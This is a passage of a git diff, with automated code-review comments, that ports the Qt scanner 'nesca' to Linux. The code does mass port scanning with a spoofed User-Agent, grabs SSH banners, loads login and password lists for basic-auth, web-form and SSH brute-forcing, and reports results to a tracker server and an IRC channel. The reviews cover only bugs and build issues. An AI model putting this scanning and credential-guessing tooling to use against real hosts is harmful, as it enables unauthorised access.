+ continue;
+ }
+ cont = false;
+ }
+ else
+ {
+ cout << "Recv: not an echo reply" << endl;
+ continue;
+ }
+
+ gettimeofday(&end, NULL);
+ end_t = 1000000*(end.tv_sec - start.tv_sec) + (end.tv_usec - start.tv_usec);
+
+ if(end_t < 1)
+ end_t = 1;
+
+ cout << "Elapsed time = " << end_t << " usec" << endl;
+ return end_t;
+ }
+ else
+ {
+ cout << "No data within one seconds.\n";
+ return 0;
+ }
+ }
+ return 0;
+}
+
+uint16_t in_cksum(uint16_t *addr, unsigned len)
+{
+ uint16_t answer = 0;
+ /*
+ * Our algorithm is simple, using a 32 bit accumulator (sum), we add
+ * sequential 16 bit words to it, and at the end, fold back all the
+ * carry bits from the top 16 bits into the lower 16 bits.
+ */
+ uint32_t sum = 0;
+ while (len > 1) {
+ sum += *addr++;
+ len -= 2;
+ }
+
+ // mop up an odd byte, if necessary
+ if (len == 1) {
+ *(unsigned char *)&answer = *(unsigned char *)addr ;
+ sum += answer;
+ }
+
+ // add back carry outs from top 16 bits to low 16 bits
+ sum = (sum >> 16) + (sum & 0xffff); // add high 16 to low 16
+ sum += (sum >> 16); // add carry
+ answer = ~sum; // truncate to 16 bits
+ return answer;
+}
+#endif
+QString strIP;
+QString strPort;
+const char *buff1 = "GET / HTTP/1.1\r\nHost: ";
+const char *buff2 = "\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\n\r\n";
+int Connector::_SSHLobby(char *ip, int port, conSTR *CSTR)
+{
+ char banner[256] = {0};
+ strncpy(banner, _get_ssh_banner(ip, port), 256);
+ if(strlen(banner) > 0)
+ {
+ return _EstablishSSHConnection(ip, port, CSTR, banner);
+ };
+};
+int Connector::_ConnectToPort(char *ip, const char *portC, char *hl)
+{
+ if(gPingNScan)
+ {
+ if(_pingMyTarget(ip) == 0)
+ {
+ return -2;
+ };
+ };
+
+ char mes[512] = {0};
+ conSTR CSTR;
+ CSTR.lowerBuff = NULL;
+ CSTR.size = 0;
+
+ int strFlag = 0;
+ strcpy(mes, buff1);
+ strcat(mes, ip);
+ int port = atoi(portC);
+ if(port != 80){
+ strcat(mes, ":");
+ strcat(mes, portC);
+ };
+ strcat(mes, buff2);
+ int cRes;
+
+ if(port == 443) cRes = _EstablishSSLConnection(ip, port, mes, &CSTR);
+ else if(port == 22) cRes = _SSHLobby(ip, port, &CSTR);
+ else cRes = _EstablishConnection(ip, port, mes, &CSTR);
+ int size = CSTR.size;
+
+ if(cRes == -2) return -2;
+
+ if(size > 0 && cRes != -1)
+ {
+ ++Alive;
+ ++found;
+ stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
+
+ Lexems lx;
+ lx._filler(port, CSTR.lowerBuff, ip, size, &lx, hl);
+ delete []CSTR.lowerBuff;
+ CSTR.lowerBuff = NULL;
+ };
+
+ if(CSTR.lowerBuff != NULL)
+ {
+ delete []CSTR.lowerBuff;
+ CSTR.lowerBuff = NULL;
+ };
+ strFlag = 1;
+};
diff --git a/externData.h b/externData.h
index 0dd92da..dc01889 100644
--- a/externData.h
+++ b/externData.h
@@ -1,6 +1,5 @@
#define RECV_MAX_SIZE 350000
#define REQUEST_MAX_SIZE 4096
-#define SD_BOTH 2
#define PORTSET "80,81,88,8080,8081,60001,60002,8008,8888,554,9000,441,4111,6667,3536,22,21"
#define IRC_CHAN "iskopasi_lab03"
#define CSSOCKET(Socket) shutdown(Socket, SD_BOTH); closesocket(Socket); Socket = -1;
diff --git a/externFunctions.h b/externFunctions.h
index 67b5f3d..7bb5d18 100644
--- a/externFunctions.h
+++ b/externFunctions.h
@@ -9,7 +9,7 @@ extern void BConInc();
extern void BConDec();
extern QString GetNSErrorDefinition(char *str, char *defin);
extern void _SaveBackupToFile();
-extern char* __cdecl strstri(char *_Str, const char *_SubStr);
+extern char* strstri(char *_Str, const char *_SubStr);
extern char* _getAttribute(char *str, char *attrib);
extern char *_findFirst(char *str, char *delim);
extern void nCleanup();
diff --git a/main.cpp b/main.cpp
index 64303be..7fd5c26 100644
--- a/main.cpp
+++ b/main.cpp
@@ -1,8 +1,8 @@
#include "nesca_3.h"
#include
+#include
#if defined(Q_OS_WIN32)
#include
-#include
#endif
//--Fixing _ITERATOR_DEBUG_LEVEL 0!=2
@@ -44,4 +44,4 @@ nesca_3 *gui = new nesca_3();
gui->showNormal();
return a.exec();
}
-
\ No newline at end of file
+
diff --git a/mainResources.h b/mainResources.h
index b764316..f418e59 100644
--- a/mainResources.h
+++ b/mainResources.h
@@ -1,17 +1,15 @@
#pragma once
#include "base64.h"
-#include
-#if defined(Q_OS_WIN32)
+#include
+#include
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
#pragma once
#include "iostream"
#include
#include
#include
-#include
-#endif
-#if defined(Q_OS_LINUX)
-#pragma once
+#else
#include
#include
#include
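Review bot: The new guard `#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)` does not group the way it reads, because `&&` binds tighter than `||` and the Cygwin exclusion therefore applies only to `__WIN32`. A Cygwin build that ends up with `WIN32` or `_WIN32` defined (for example after a Windows header is pulled in) would still take the Windows branch. Parenthesise it as `#if (defined(WIN32) || defined(_WIN32) || defined(__WIN32)) && !defined(__CYGWIN__)`. The same expression is repeated in connector.cpp, so defining one project-level platform macro in this header and testing that everywhere would keep the copies from drifting.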
@@ -36,16 +34,20 @@
#define WSAGetLastError() errno
#define closesocket(sock) ::close((sock))
+typedef unsigned int DWORD;
+typedef void* LPVOID;
+typedef void* HANDLE;
typedef unsigned int UINT;
typedef const char * LPCSTR;
typedef int SOCKET;
typedef hostent HOSTENT;
typedef struct linger LINGER;
typedef int BOOL;
+
#define INVALID_SOCKET (SOCKET)(~0)
-#define SOCKET_ERROR (-1)
+#define SOCKET_ERROR (-1)
#define SD_BOTH 0x02
-#define FAR far
+#define FAR far
#endif
#define MAX_ADDR_LEN 128
diff --git a/nesca.pro b/nesca.pro
index 59b12cd..9edf02e 100644
--- a/nesca.pro
+++ b/nesca.pro
@@ -8,13 +8,65 @@ QT += core gui
greaterThan(QT_MAJOR_VERSION, 4): QT += widgets
+PKGCONFIG += openssl
+CONFIG += c++11
+
TARGET = nesca
TEMPLATE = app
+LIBS += -lssh
+INCLUDEPATH += /opt/Qt5.3.2/5.3/gcc_64/include/QtWidgets/
+SOURCES +=\
+ main.cpp \
+ ActivityDrawerTh_HorNet.cpp \
+ base64.cpp \
+ CheckKey_Th.cpp \
+ CheckProxy_Th.cpp \
+ connector.cpp \
+ DrawerTh_GridQoSScanner.cpp \
+ DrawerTh_HorNet.cpp \
+ DrawerTh_ME2Scanner.cpp \
+ DrawerTh_QoSScanner.cpp \
+ DrawerTh_VoiceScanner.cpp \
+ irc_nmblinker.cpp \
+ IRCPinger_Th.cpp \
+ msgcheckerthread.cpp \
+ nesca_3.cpp \
+ nesca_startModule.cpp \
+ oIRC_Th.cpp \
+ piestat.cpp \
+ progressbardrawer.cpp \
+ STh.cpp \
+ vercheckerthread.cpp
-SOURCES += main.cpp\
- mainwindow.cpp
+HEADERS += ActivityDrawerTh_HorNet.h \
+ base64.h \
+ CheckKey_Th.h \
+ CheckProxy_Th.h \
+ DrawerTh_GridQoSScanner.h \
+ DrawerTh_HorNet.h \
+ DrawerTh_ME2Scanner.h \
+ DrawerTh_QoSScanner.h \
+ DrawerTh_VoiceScanner.h \
+ externData.h \
+ externFunctions.h \
+ irc_nmblinker.h \
+ IRCPinger_Th.h \
+ mainResources.h \
+ msgcheckerthread.h \
+ nesca_3.h \
+ oIRC_Th.h \
+ piestat.h \
+ progressbardrawer.h \
+ resource.h \
+ STh.h \
+ vercheckerthread.h
-HEADERS += mainwindow.h
+FORMS += nesca_3.ui
+
+RESOURCES += \
+ nesca_3.qrc
+
+OTHER_FILES += \
+ nesca_3.rc
-FORMS += mainwindow.ui
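Review bot: `INCLUDEPATH += /opt/Qt5.3.2/5.3/gcc_64/include/QtWidgets/` hard-codes one machine's Qt install into the project file; the `QT += widgets` line above it already supplies the QtWidgets include path, so this line can be dropped. `PKGCONFIG += openssl` is only honoured by qmake when `CONFIG += link_pkgconfig` is set, which this hunk does not add, so the OpenSSL flags may not reach the compiler or linker. `LIBS += -lssh` is added unconditionally; if the Windows build links libssh differently, a `unix { … }` scope around the Unix-specific lines would keep the two configurations apart.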
diff --git a/nesca_3.cpp b/nesca_3.cpp
index 236a3eb..0fcade7 100644
--- a/nesca_3.cpp
+++ b/nesca_3.cpp
@@ -170,7 +170,7 @@ bool ME2ScanFlag = true, QoSScanFlag = false, VoiceScanFlag = false, PieStatFlag
Ui::nesca_3Class *ui = new Ui::nesca_3Class;
-#pragma endregion
+
void setSceneArea()
{
delete ui->graphicsVoice;
@@ -1426,16 +1426,16 @@ void nesca_3::ConnectToIRCServer()
}
else
{
-#pragma region QTGUI_Area
+
ui->ircText->append("No IRC port specified!");
-#pragma endregion
+
};
}
else
{
-#pragma region QTGUI_Area
+
ui->ircText->append("No IRC server specified!");
-#pragma endregion
+
};
};
void nesca_3::ChangeIRCRawLog()
@@ -2514,7 +2514,7 @@ void nesca_3::smReaction()
};
};
-#pragma endregion
+
void nesca_3::IPScanSeq()
{
if(ui->ipLine->text() != "")
@@ -2919,7 +2919,7 @@ void nesca_3::ConnectEvrthng()
connect ( psTh, SIGNAL(sUpdatePie()), this, SLOT(slotUpdatePie()) );
connect ( irc_nmb, SIGNAL(sBlinkMessage()), this, SLOT(slotBlinkMessage()) );
};
-#pragma endregion
+
void RestoreSession()
{
@@ -2929,9 +2929,9 @@ void RestoreSession()
if(resFile != NULL)
{
-#pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("Previous session file found! Restoring...");
-#pragma endregion
+
while(fgets(resStr, 128, resFile) != NULL)
{
if(strstr(resStr, "[SESSION]:") != NULL)
@@ -3198,9 +3198,9 @@ void RestoreSession()
};
fclose(resFile);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Previous session restored.");
-#pragma endregion
+
};
}
void CreateVerFile()
@@ -3338,10 +3338,10 @@ void _startMsgCheck()
WSADATA wsda;
if (WSAStartup(0x0101, &wsda))
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("WSAStartup failed.");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
#endif
@@ -3829,7 +3829,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
pos += colr.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region Bold-handler
int posBold = 0;
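Review bot: The `#pragma region Bold-handler` opener kept at the end of this hunk no longer has a closing `#pragma endregion`, because the next hunk deletes it. The `underline-handler` and `link-handler` openers in the following hunks, and `#pragma region SSHPASS` in nesca_startModule.cpp, are left in the same state. Toolchains that do not know the pragma may still warn on the leftover openers, and editors that fold on it lose the pairing, so the cleanup is only half done. Either delete the remaining `#pragma region` lines as well, or keep the pairs and guard them with `#ifdef _MSC_VER`.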
@@ -3844,7 +3844,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
posBold += boldr.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region underline-handler
int posUnder = 0;
@@ -3859,7 +3859,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
posUnder += under.matchedLength();
thisIsUrl = true;
};
-#pragma endregion
+
#pragma region link-handler
r.indexIn(str);
@@ -3871,7 +3871,7 @@ void nesca_3::appendDefaultIRCText(bool pm, bool hlflag, int cCode, QString str,
str.replace(r, "" + link.trimmed() + " ");
thisIsUrl = true;
};
-#pragma endregion
+
str.replace("", "");
str.replace("", "");
diff --git a/nesca_3.h b/nesca_3.h
index 5c39a60..585757c 100644
--- a/nesca_3.h
+++ b/nesca_3.h
@@ -9,8 +9,8 @@
#include
#include
#include "ui_nesca_3.h"
-#include
-#include
+#include
+#include
#include
#include
#include
@@ -18,7 +18,8 @@
#include
#include
#include
-#include
+#include
+#include
extern Ui::nesca_3Class *ui;
extern bool widgetIsHidden, IRCLogToggled, BALogSwitched, blinkFlag, disableBlink, debugFileOK, QOSWait,
@@ -192,7 +193,7 @@ protected:
move(x()+delta.x(), y()+delta.y());
oldPos = evt->globalPos();
}
- void mouseReleaseEvent(QMouseEvent *evt)
+ void mouseReleaseEvent()
{
if(switchWindows)
{
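Review bot: Changing the signature to `void mouseReleaseEvent()` stops this function from overriding the Qt handler, which takes a `QMouseEvent *`. Assuming the class derives from QWidget (the base is outside the hunk), Qt will no longer call it and the `switchWindows` logic in the body will not run on mouse release. If the aim was to silence an unused-parameter warning, keep the parameter and leave it unnamed, `void mouseReleaseEvent(QMouseEvent *)`, or add `Q_UNUSED(evt);` as the first statement. Marking the event handlers `override` would make the compiler reject this kind of mismatch. The body continues outside the hunk.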
diff --git a/nesca_3.ui b/nesca_3.ui
index 1a30e30..bb2476c 100644
--- a/nesca_3.ui
+++ b/nesca_3.ui
@@ -32,7 +32,7 @@
NESCA 3
-
+
:/nesca_3/Z:/nesca.ico:/nesca_3/Z:/nesca.ico
@@ -1677,7 +1677,7 @@ border-radius: 3px;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Consolas'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Consolas'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:'MS Shell Dlg 2'; font-size:8pt;"><br /></p></body></html>
@@ -2179,7 +2179,7 @@ p, li { white-space: pre-wrap; }
-
+
:/nesca_3/Z:/nesca.ico:/nesca_3/Z:/nesca.ico
@@ -2432,7 +2432,7 @@ p, li { white-space: pre-wrap; }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3043,62 +3043,188 @@ background-color: #000000;
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 49
- 49
- 49
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 49
- 49
- 49
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
-
-
- 0
- 0
- 0
-
+
+
+
+
+ 16
+ 16
+ 16
+
+
+
+
+ 0
+ 0
+ 0
+
+
+
@@ -3287,7 +3413,7 @@ background-color: #000000;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3423,7 +3549,7 @@ p, li { white-space: pre-wrap; }
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
p, li { white-space: pre-wrap; }
-</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
+</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
<p style="-qt-paragraph-type:empty; margin-top:2px; margin-bottom:2px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html>
@@ -3884,8 +4010,6 @@ color: rgb(71, 71, 71);
exitButton
dataText
-
-
-
+
diff --git a/nesca_startModule.cpp b/nesca_startModule.cpp
index cbd4f17..5aafbae 100644
--- a/nesca_startModule.cpp
+++ b/nesca_startModule.cpp
@@ -141,9 +141,9 @@ void ConInc()
{
lock inc cons;
};
- #pragma region QTGUI_Area
+
stt->doEmitionThreads(QString::number(cons) + "/" + QString::number(gThreads));
- #pragma endregion
+
};
void ConDec()
{
@@ -154,9 +154,9 @@ void ConDec()
lock dec cons;
};
};
- #pragma region QTGUI_Area
+
stt->doEmitionThreads(QString::number(cons) + "/" + QString::number(gThreads));
- #pragma endregion
+
};
void _SaveBackupToFile()
{
@@ -411,10 +411,10 @@ void *_timer()
strcat(dbuffer, "d)");
strcat(timeLeft, (strcmp(dbuffer, "1.$d)") == 0 ? "INF)" : dbuffer));
-#pragma region QTGUI_Area
+
stt->doEmitionIPS(QString(timeLeft));
stt->doEmitionOffline(QString::number(offlines));
-#pragma endregion
+
ZeroMemory(timeLeft, sizeof(timeLeft));
ZeroMemory(dbuffer, sizeof(dbuffer));
Sleep(1000);
@@ -463,18 +463,18 @@ void *_tracker()
if(connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot connect to balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
if(send(sock, msg, strlen(msg), 0) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot send to balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -497,9 +497,9 @@ void *_tracker()
if(test == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot recv from balancer! " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -515,19 +515,19 @@ void *_tracker()
if(ln > 64)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
SaveErrorLog("NS-Track", msg, rBuffT);
-#pragma endregion
+
continue;
}
else strncpy(ndbServer, (char*)(t1 + strlen("http://")), ln);
if(strlen(t2) > 64)
{
-#pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("[NS-Track] -Fragmentation detected!");
-#pragma endregion
+
if(strstr(t2, "\r\n") != NULL)
{
char *t3 = strstr(t2, "\r\n");
@@ -536,9 +536,9 @@ void *_tracker()
if(y > 64)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
continue;
}
@@ -546,18 +546,18 @@ void *_tracker()
{
strncpy(ndbScriptT, t2, y);
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("[NS-Track] -OK! -Fragmented server string aquired! Starting NS-Track loop...");
-#pragma endregion
+
strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) );
};
}
else
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
continue;
};
@@ -565,9 +565,9 @@ void *_tracker()
else
{
strcpy(ndbScriptT, t2);
-#pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("[NS-Track] -OK! -Server string aquired! Starting NS-Track loop...");
-#pragma endregion
+
CSSOCKET(sock);
strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) - 2 );
};
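Review bot: `strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) - 2)` underflows when the string is shorter than two characters: `strlen` returns `size_t`, so the count wraps to a huge value and `strncpy` then writes far past `ndbScript`. `ndbScriptT` is filled by `strcpy` from `t2`, which appears to come from the balancer's reply (its origin is outside the hunk), so the length is decided by the remote side. Check it first, after the `CSSOCKET(sock)` call, with `size_t len = strlen(ndbScriptT); if(len < 2) continue;`, and terminate the destination explicitly, since `strncpy` with a count below the source length writes no NUL. The `strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT))` call in the previous hunk has the same missing terminator.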
@@ -575,9 +575,9 @@ void *_tracker()
else
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -Cannot receive script value!");
-#pragma endregion
+
continue;
};
@@ -668,9 +668,9 @@ void *_tracker()
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -connect() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
continue;
};
@@ -684,9 +684,9 @@ void *_tracker()
if(send(sock, msg, strlen(msg), 0) == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -send() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, "");
continue;
};
@@ -729,29 +729,29 @@ void *_tracker()
if(test == -1)
{
CSSOCKET(sock);
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[NS-Track] -recv() returned " + QString::number(WSAGetLastError()) + ".");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, "");
continue;
};
if(strstr(rBuffT, "201 Created") != NULL)
{
-#pragma region QTGUI_Area
+
if(gDebugMode) stt->doEmitionYellowFoundData("[NS-Track] -OK. Data saved!");
stt->doEmitionDataSaved(true);
Sleep(1000);
stt->doEmitionDataSaved(false);
-#pragma endregion
+
}
else if(strstr(rBuffT, "400 Bad Request") != NULL)
{
-#pragma region QTGUI_Area
+
QString errorDef = GetNSErrorDefinition(rBuffT, "notify");
if(errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] [Key is unauthorized] A valid key is required.");
else stt->doEmitionYellowFoundData("[NS-Track] -FAIL! [400 Bad Request : " + errorDef + "]");
-#pragma endregion
+
SaveErrorLog("NS-Track", msg, rBuffT);
}
else
@@ -868,7 +868,7 @@ unsigned long int numOfIps(int ipsstart[], int ipsend[])
// // };
// // };
// //};
-//#pragma endregion
+//
//
// return res;
//};
@@ -913,10 +913,10 @@ void targetAndIPWriter(unsigned long int target, char *buff)
strcpy(curIPBuff, "--->");
strcat(curIPBuff, buff);
- #pragma region QTGUI_Area
+
stt->doEmitionIPRANGE(QString(curIPBuff));
stt->doEmitionTargetsLeft(QString(targetNPers));
- #pragma endregion
+
};
void _passLoginFapper()
{
@@ -971,9 +971,9 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Password list loaded (" + QString(std::to_string(MaxPass).c_str()) + " entries)");
- #pragma endregion
+
i = 0;
@@ -986,19 +986,19 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Login list loaded (" + QString(std::to_string(MaxLogin).c_str()) + " entries)");
- #pragma endregion
+
fclose(loginList);
fclose(passList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
MaxWFLogin = 0;
@@ -1052,9 +1052,9 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("WFPassword list loaded (" + QString(std::to_string(MaxWFPass).c_str()) + " entries)");
- #pragma endregion
+
i = 0;
@@ -1067,19 +1067,19 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("WFLogin list loaded (" + QString(std::to_string(MaxWFLogin).c_str()) + " entries)");
- #pragma endregion
+
fclose(wfLoginList);
fclose(wfLoginList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
#pragma region SSHPASS
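Review bot: The success branch closes `wfLoginList` twice (`fclose(wfLoginList); fclose(wfLoginList);`), which is undefined behaviour on the second call and probably leaves the second list of this section open. The earlier Login/Password branch of the same function closes two different handles (`fclose(loginList); fclose(passList);`), so the second call here was presumably meant for the WF password-list handle, whose name is not visible in this hunk: `fclose(<WF password list handle>);`. This commit only strips the `#pragma region` markers and leaves the double close in place. The body of _passLoginFapper starts before and continues after the hunk.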
@@ -1118,24 +1118,24 @@ void _passLoginFapper()
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("SSH Password list loaded (" + QString(std::to_string(MaxSSHPass).c_str()) + " entries)");
- #pragma endregion
+
fclose(sshlpList);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No password/login list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
-#pragma endregion
- #pragma region QTGUI_Area
+
+
stt->doEmitionYellowFoundData("BA: ~" + QString(std::to_string(MaxLogin * MaxPass/gTimeOut/60).c_str()) + "; WF: ~" + QString(std::to_string(MaxWFLogin * MaxWFPass/gTimeOut/60).c_str()) + "; SSH: ~" + QString(std::to_string(MaxSSHPass/gTimeOut/60).c_str()));
- #pragma endregion
+
};
void ReadUTF8(FILE* nFile, char *cp)
{
@@ -1231,19 +1231,19 @@ void ReadUTF8(FILE* nFile, char *cp)
ZeroMemory(buffFG, sizeof(buffFG));
};
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Negative list loaded (" + QString::number(GlobalNegativeSize) + " entries)");
- #pragma endregion
+
ZeroMemory(buffFG, sizeof(buffFG));
fclose(nFile);
}
else
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("No negative list found");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
}
#ifdef WIN32
@@ -1341,10 +1341,10 @@ void CheckMaskBits(char *res, int index)
}
else
{
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[CheckMaskBits] Cannot parse IP list");
stt->doEmitionKillSttThread();
-#pragma endregion
+
};
};
void GetOctets(char *curIP)
@@ -2225,7 +2225,7 @@ int _GetDNSFromMask(char *mask, char *saveMask, char *saveMaskEnder)
};
#endif
Sleep(gThreadDelay);
-#pragma endregion
+
};
};
@@ -2275,10 +2275,10 @@ int startScan(char* args)
int resInit = fInit(gMode, gRange);
if(resInit == -1 )
{
- #pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("[Error] fInit failure");
stt->doEmitionKillSttThread();
- #pragma endregion
+
return -1;
};
@@ -2797,26 +2797,26 @@ stt->doEmitionThreads(QString::number(0) + "/" + QString::number(gThreads));
}
else
{
-#pragma region QTGUI_Area
+
stt->doEmitionRedFoundData("Wrong parameters.");
-#pragma endregion
+
};
Sleep(gTimeOut + 1);
- #pragma region QTGUI_Area
+
stt->doEmitionYellowFoundData("Stopping threads...");
stt->doEmitionChangeStatus("Stopping...");
- #pragma endregion
+
while(cons > 0 || isActive == 1 || jsonArr->size() > 0) Sleep(2000);
nCleanup();
- #pragma region QTGUI_Area
+
stt->doEmitionGreenFoundData("Done. Saved: " + QString::number(saved) + "; Alive: " + QString::number(found) + ".");
stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
stt->doEmitionChangeStatus("Idle");
stt->doEmitionKillSttThread();
- #pragma endregion
+
};
void nCleanup(){